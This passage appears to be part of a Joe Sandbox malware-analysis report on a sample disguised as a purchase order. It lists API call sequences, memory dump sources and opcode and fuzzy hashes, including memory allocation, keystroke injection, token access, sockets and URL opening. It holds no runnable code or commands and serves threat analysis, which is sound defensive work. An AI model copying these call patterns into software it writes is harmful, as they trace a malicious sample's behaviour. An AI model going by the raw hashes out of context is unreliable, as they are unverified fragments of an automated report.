                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: RegDeleteKeyExW$advapi32.dll
                        • API String ID: 2574300362-4033151799
                        • Opcode ID: c0979a7461a417acc8063fe0854b82956602cea864bbdd8de4fe70ad936208b7
                        • Instruction ID: 865a168cbe5f8cbdaa58815c96ae44eba0edb1ebf24957469fa07048d1b79cff
                        • Opcode Fuzzy Hash: c0979a7461a417acc8063fe0854b82956602cea864bbdd8de4fe70ad936208b7
                        • Instruction Fuzzy Hash: 02D092709007139FD7669B65E84968676ECAF29715F118429E4E6D2654EAF0C8808A90
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9d774595cd4350f1ae57432c01d8168699274f923cd0119b5cfd88b681c4022e
                        • Instruction ID: 1899e85fb0a59a6d3183409ed532f26a09b14dda6594c172669df75fec54d003
                        • Opcode Fuzzy Hash: 9d774595cd4350f1ae57432c01d8168699274f923cd0119b5cfd88b681c4022e
                        • Instruction Fuzzy Hash: CAC1BF75A6025AEFCB14CFA5C894EAEB7B5FF48304F508598E801EB251D730EE51CBA1
                        APIs
                        • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00306AA6), ref: 002BAB2D
                        • _wcscmp.LIBCMT ref: 002BAB49
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharUpper_wcscmp
                        • String ID:
                        • API String ID: 820872866-0
                        • Opcode ID: 2028c614d5c97319f5b3d809169820c35d0f56bdc22b464fbaeea466f571280b
                        • Instruction ID: ff28a84ce948f3f909ea3f132bd95919628bbaa0865b5c48439b7cdaae6adfe0
                        • Opcode Fuzzy Hash: 2028c614d5c97319f5b3d809169820c35d0f56bdc22b464fbaeea466f571280b
                        • Instruction Fuzzy Hash: 38A1157172010BDBDB15DF65E9816ADBBB5FF44380F64416AEC56C32A0EB309870CB92
                        APIs
                        • CharLowerBuffW.USER32(?,?), ref: 00310D85
                        • CharLowerBuffW.USER32(?,?), ref: 00310DC8
                          • Part of subcall function 00310458: CharLowerBuffW.USER32(?,?,?,?), ref: 00310478
                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00310FB2
                        • _memmove.LIBCMT ref: 00310FC2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharLower$AllocVirtual_memmove
                        • String ID:
                        • API String ID: 3659485706-0
                        • Opcode ID: 03ca72c61a88c74c2d47288d7e448bd9460088c920d30ef6e12eba149409ca47
                        • Instruction ID: 735f4feea7e01c3fd1f68adcb3768c7a8895707984d228ea5c24c8fbe5731ccf
                        • Opcode Fuzzy Hash: 03ca72c61a88c74c2d47288d7e448bd9460088c920d30ef6e12eba149409ca47
                        • Instruction Fuzzy Hash: 02B1BF716043008FC709DF28C48099AB7E5EF88754F14896EF8899B351DB71ED86CF91
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 0030AF56
                        • CoUninitialize.OLE32 ref: 0030AF61
                          • Part of subcall function 002F1050: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002F10B8
                        • VariantInit.OLEAUT32(?), ref: 0030AF6C
                        • VariantClear.OLEAUT32(?), ref: 0030B23F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                        • String ID:
                        • API String ID: 780911581-0
                        APIs
                        Similarity
                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                        • String ID:
                        • API String ID: 3877424927-0
                        APIs
                        • GetWindowRect.USER32(01698308,?), ref: 0031C354
                        • ScreenToClient.USER32(?,00000002), ref: 0031C384
                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0031C3EA
                        Similarity
                        • API ID: Window$ClientMoveRectScreen
                        • String ID:
                        • API String ID: 3880355969-0
                        APIs
                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 002ED258
                        • __itow.LIBCMT ref: 002ED292
                          • Part of subcall function 002ED4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 002ED549
                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 002ED2FB
                        • __itow.LIBCMT ref: 002ED350
                        Similarity
                        • API ID: MessageSend$__itow
                        • String ID:
                        • API String ID: 3379773720-0
                        APIs
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002FEF32
                        • GetLastError.KERNEL32(?,00000000), ref: 002FEF58
                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002FEF7D
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002FEFA9
                        Similarity
                        • API ID: CreateHardLink$DeleteErrorFileLast
                        • String ID:
                        • API String ID: 3321077145-0
                        APIs
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0031B3E1
                        Similarity
                        • API ID: InvalidateRect
                        • String ID:
                        • API String ID: 634782764-0
                        APIs
                        • ClientToScreen.USER32(?,?), ref: 0031D617
                        • GetWindowRect.USER32(?,?), ref: 0031D68D
                        • PtInRect.USER32(?,?,0031EB2C), ref: 0031D69D
                        • MessageBeep.USER32(00000000), ref: 0031D70E
                        Similarity
                        • API ID: Rect$BeepClientMessageScreenWindow
                        • String ID:
                        • API String ID: 1352109105-0
                        APIs
                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 002F44EE
                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 002F450A
                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 002F456A
                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 002F45C8
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002E4DE8
                        • __isleadbyte_l.LIBCMT ref: 002E4E16
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 002E4E44
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 002E4E7A
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        APIs
                        • GetForegroundWindow.USER32 ref: 00317AB6
                          • Part of subcall function 002F69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 002F69E3
                          • Part of subcall function 002F69C9: GetCurrentThreadId.KERNEL32 ref: 002F69EA
                          • Part of subcall function 002F69C9: AttachThreadInput.USER32(00000000,?,002F8127), ref: 002F69F1
                        • GetCaretPos.USER32(?), ref: 00317AC7
                        • ClientToScreen.USER32(00000000,?), ref: 00317B00
                        • GetForegroundWindow.USER32 ref: 00317B06
                        Similarity
                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                        • String ID:
                        • API String ID: 2759813231-0
                        APIs
                          • Part of subcall function 002CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 002CAF8E
                        • GetCursorPos.USER32(?), ref: 0031EFE2
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0032F3C3,?,?,?,?,?), ref: 0031EFF7
                        • GetCursorPos.USER32(?), ref: 0031F041
                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0032F3C3,?,?,?), ref: 0031F077
                        Similarity
                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                        • String ID:
                        • API String ID: 2864067406-0
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003049B7
                          • Part of subcall function 00304A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00304A60
                          • Part of subcall function 00304A41: InternetCloseHandle.WININET(00000000), ref: 00304AFD
                        Similarity
                        • API ID: Internet$CloseConnectHandleOpen
                        • String ID:
                        • API String ID: 1463438336-0
                        APIs
                        • GetWindowLongW.USER32(?,000000EC), ref: 003188A3
                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003188BD
                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003188CB
                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003188D9
                        Similarity
                        • API ID: Window$Long$AttributesLayered
                        • String ID:
                        • API String ID: 2169480361-0
                        APIs
                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 0030906D
                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 0030907F
                        • accept.WSOCK32(00000000,00000000,00000000), ref: 0030908C
                        • WSAGetLastError.WSOCK32(00000000), ref: 003090A3
                        Similarity
                        • API ID: ErrorLastacceptselect
                        • String ID:
                        • API String ID: 385091864-0
                        APIs
                          • Part of subcall function 002F2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,002F18FD,?,?,?,002F26BC,00000000,000000EF,00000119,?,?), ref: 002F2CB9
                          • Part of subcall function 002F2CAA: lstrcpyW.KERNEL32(00000000,?,?,002F18FD,?,?,?,002F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 002F2CDF
                          • Part of subcall function 002F2CAA: lstrcmpiW.KERNEL32(00000000,?,002F18FD,?,?,?,002F26BC,00000000,000000EF,00000119,?,?), ref: 002F2D10
                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,002F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 002F1916
                        • lstrcpyW.KERNEL32(00000000,?,?,002F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 002F193C
                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,002F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 002F1970
                        Strings
                        Similarity
                        • API ID: lstrcmpilstrcpylstrlen
                        • String ID: cdecl
                        • API String ID: 4031866154-3896280584
                        APIs
                        • _free.LIBCMT ref: 002E3D65
                          • Part of subcall function 002D45EC: __FF_MSGBANNER.LIBCMT ref: 002D4603
                          • Part of subcall function 002D45EC: __NMSG_WRITE.LIBCMT ref: 002D460A
                          • Part of subcall function 002D45EC: RtlAllocateHeap.NTDLL(01670000,00000000,00000001,?,?,?,?,002D0127,?,002B125D,00000058,?,?), ref: 002D462F
                        Similarity
                        • API ID: AllocateHeap_free
                        • String ID:
                        • API String ID: 614378929-0
                        APIs
                        • _memset.LIBCMT ref: 002B1E87
                          • Part of subcall function 002B38E4: _memset.LIBCMT ref: 002B3965
                          • Part of subcall function 002B38E4: _wcscpy.LIBCMT ref: 002B39B5
                          • Part of subcall function 002B38E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 002B39C6
                        • KillTimer.USER32(?,00000001), ref: 002B1EDC
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002B1EEB
                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00324526
                        Similarity
                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                        • String ID:
                        • API String ID: 1378193009-0
                        APIs
                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002F715C
                        • _memset.LIBCMT ref: 002F717D
                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002F71CF
                        • CloseHandle.KERNEL32(00000000), ref: 002F71D8
                        Similarity
                        • API ID: CloseControlCreateDeviceFileHandle_memset
                        • String ID:
                        • API String ID: 1157408455-0
                        APIs
                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002F13EE
                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 002F1409
                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002F141F
                        • FreeLibrary.KERNEL32(?), ref: 002F1474
                        Similarity
                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                        • String ID:
                        • API String ID: 3137044355-0
                        APIs
                          • Part of subcall function 002CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,002FAEA5,?,?,00000000,00000008), ref: 002CF282
                          • Part of subcall function 002CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,002FAEA5,?,?,00000000,00000008), ref: 002CF2A6
                        • gethostbyname.WSOCK32(?,?,?), ref: 003092F0
                        • WSAGetLastError.WSOCK32(00000000), ref: 003092FB
                        • _memmove.LIBCMT ref: 00309328
                        • inet_ntoa.WSOCK32(?), ref: 00309333
                        Similarity
                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                        • String ID:
                        • API String ID: 1504782959-0
                        APIs
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 002EC285
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002EC297
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002EC2AD
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002EC2C8
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 002F7C6C
                        • MessageBoxW.USER32(?,?,?,?), ref: 002F7C9F
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002F7CB5
                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002F7CBC
                        Similarity
                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                        • String ID:
                        • API String ID: 2880819207-0
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002CC657
                        • GetStockObject.GDI32(00000011), ref: 002CC66B
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 002CC675
                        Similarity
                        • API ID: CreateMessageObjectSendStockWindow
                        • String ID:
                        • API String ID: 3970641297-0
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002F354D,?,002F45D5,?,00008000), ref: 002F49EE
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,002F354D,?,002F45D5,?,00008000), ref: 002F4A13
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002F354D,?,002F45D5,?,00008000), ref: 002F4A1D
                        • Sleep.KERNEL32(?,?,?,?,?,?,?,002F354D,?,002F45D5,?,00008000), ref: 002F4A50
                        Similarity
                        • API ID: CounterPerformanceQuerySleep
                        • String ID:
                        • API String ID: 2875609808-0
                        APIs
                        Similarity
                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                        • String ID:
                        • API String ID: 3016257755-0
                        APIs
                          • Part of subcall function 002D869D: __getptd_noexit.LIBCMT ref: 002D869E
                        • __lock.LIBCMT ref: 002D811F
                        • InterlockedDecrement.KERNEL32(?), ref: 002D813C
                        • _free.LIBCMT ref: 002D814F
                        • InterlockedIncrement.KERNEL32(01697968), ref: 002D8167
                        Similarity
                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                        • String ID:
                        • API String ID: 2704283638-0
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 0031DE07
                        • ScreenToClient.USER32(?,?), ref: 0031DE1F
                        • ScreenToClient.USER32(?,?), ref: 0031DE43
                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0031DE5E
                        Similarity
                        • API ID: ClientRectScreen$InvalidateWindow
                        • String ID:
                        • API String ID: 357397906-0
                        APIs
                        • EnterCriticalSection.KERNEL32(?), ref: 002F9C7F
                          • Part of subcall function 002FAD14: _memset.LIBCMT ref: 002FAD49
                        • _memmove.LIBCMT ref: 002F9CA2
                        • _memset.LIBCMT ref: 002F9CAF
                        • LeaveCriticalSection.KERNEL32(?), ref: 002F9CBF
                        Similarity
                        • API ID: CriticalSection_memset$EnterLeave_memmove
                        • String ID:
                        • API String ID: 48991266-0
                        APIs
                          • Part of subcall function 002CB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 002CB5EB
                          • Part of subcall function 002CB58B: SelectObject.GDI32(?,00000000), ref: 002CB5FA
                          • Part of subcall function 002CB58B: BeginPath.GDI32(?), ref: 002CB611
                          • Part of subcall function 002CB58B: SelectObject.GDI32(?,00000000), ref: 002CB63B
                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0031E860
                        • LineTo.GDI32(00000000,?,?), ref: 0031E86D
                        • EndPath.GDI32(00000000), ref: 0031E87D
                        • StrokePath.GDI32(00000000), ref: 0031E88B
                        Similarity
                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                        • String ID:
                        • API String ID: 1539411459-0
                        APIs
                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002ED640
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 002ED653
                        • GetCurrentThreadId.KERNEL32 ref: 002ED65A
                        • AttachThreadInput.USER32(00000000), ref: 002ED661
                        Similarity
                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                        • String ID:
                        • API String ID: 2710830443-0
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 002EBE01
                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,002EB9C9), ref: 002EBE08
                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002EB9C9), ref: 002EBE15
                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,002EB9C9), ref: 002EBE1C
                        Similarity
                        • API ID: CurrentOpenProcessThreadToken
                        • String ID:
                        • API String ID: 3974789173-0
                        APIs
                        • GetSysColor.USER32(00000008), ref: 002CB0C5
                        • SetTextColor.GDI32(?,000000FF), ref: 002CB0CF
                        • SetBkMode.GDI32(?,00000001), ref: 002CB0E4
                        • GetStockObject.GDI32(00000005), ref: 002CB0EC
                        • GetWindowDC.USER32(?,00000000), ref: 0032ECFA
                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0032ED07
                        • GetPixel.GDI32(00000000,?,00000000), ref: 0032ED20
                        • GetPixel.GDI32(00000000,00000000,?), ref: 0032ED39
                        • GetPixel.GDI32(00000000,?,?), ref: 0032ED59
                        • ReleaseDC.USER32(?,00000000), ref: 0032ED64
                        Similarity
                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                        • String ID:
                        • API String ID: 1946975507-0
                        • Opcode ID: 7765df7343a2de9ed9d74c65d2d077c63459d6a1d4d43a3caf8a6bae8aca838d
                        • Instruction ID: da6911e961b1e73311bf93a0220de813c206eb310b161972d15eb812c3ee597a
                        • Opcode Fuzzy Hash: 7765df7343a2de9ed9d74c65d2d077c63459d6a1d4d43a3caf8a6bae8aca838d
                        • Instruction Fuzzy Hash: B7E0ED31504240AFEB635F74BC8ABD83B25AB56336F148366F669580E2C7B24590DB11
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002EC071
                        • UnloadUserProfile.USERENV(?,?), ref: 002EC07D
                        • CloseHandle.KERNEL32(?), ref: 002EC086
                        • CloseHandle.KERNEL32(?), ref: 002EC08E
                          • Part of subcall function 002EB850: GetProcessHeap.KERNEL32(00000000,?,002EB574), ref: 002EB857
                          • Part of subcall function 002EB850: HeapFree.KERNEL32(00000000), ref: 002EB85E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                        • String ID:
                        • API String ID: 146765662-0
                        • Opcode ID: f0f33e69db630688dfb43533a804e84e11e68f9ed97608f49615acee74f1f47e
                        • Instruction ID: dad210e5009ebc2fb3dba07080cf21aed629c6edbb114a5bd3474315f24b6af8
                        • Opcode Fuzzy Hash: f0f33e69db630688dfb43533a804e84e11e68f9ed97608f49615acee74f1f47e
                        • Instruction Fuzzy Hash: EEE0BF36504006BBCB426FA5ED48859FB2EFF49321B104325F61581571CB326431EB90
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: 318b329e3924bedeca46b821c4a486d1a2f23c267ee7b015cd49549d384d4781
                        • Instruction ID: da7e2d937df8b92a60e8ec34b145b39329ec18825a5632d355e2f8354269f24c
                        • Opcode Fuzzy Hash: 318b329e3924bedeca46b821c4a486d1a2f23c267ee7b015cd49549d384d4781
                        • Instruction Fuzzy Hash: 7CE046B1510200EFDB025F70EC89A693BADEB4C360F51C409FC5A8B210DBB999808F40
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: 1fbf81f8edb87c6e05a5745eb237d4433432e6176a8f9202229c4ed94214c885
                        • Instruction ID: 121204827a2fef4a5a7fead31981c86f386ece79afd86d761edd57a4398a47e3
                        • Opcode Fuzzy Hash: 1fbf81f8edb87c6e05a5745eb237d4433432e6176a8f9202229c4ed94214c885
                        • Instruction Fuzzy Hash: 78E046B1510200EFDB025F70EC89A693BA9EB4C3A0F518409F95A8B210DBB999808F40
                        APIs
                        • __getptd_noexit.LIBCMT ref: 002D4C3E
                          • Part of subcall function 002D86B5: GetLastError.KERNEL32(?,002D0127,002D88A3,002D4673,?,?,002D0127,?,002B125D,00000058,?,?), ref: 002D86B7
                          • Part of subcall function 002D86B5: __calloc_crt.LIBCMT ref: 002D86D8
                          • Part of subcall function 002D86B5: GetCurrentThreadId.KERNEL32 ref: 002D8701
                          • Part of subcall function 002D86B5: SetLastError.KERNEL32(00000000,002D0127,002D88A3,002D4673,?,?,002D0127,?,002B125D,00000058,?,?), ref: 002D8719
                        • CloseHandle.KERNEL32(?,?,002D4C1D), ref: 002D4C52
                        • __freeptd.LIBCMT ref: 002D4C59
                        • ExitThread.KERNEL32 ref: 002D4C61
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                        • String ID:
                        • API String ID: 408300095-0
                        • Opcode ID: f761d38d48ec19eb91d72265cb05a888e3e1e7c85c692650673f993ba7f2c115
                        • Instruction ID: 069870b860c5ac2a5fd8c62b2d018c8311b4283f3e5a3b49ef7fdcd4588dcef2
                        • Opcode Fuzzy Hash: f761d38d48ec19eb91d72265cb05a888e3e1e7c85c692650673f993ba7f2c115
                        • Instruction Fuzzy Hash: DFD0A731422A524BC1323B209D0E60D32585F01B35F014307F075052E19F30DC214AD1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
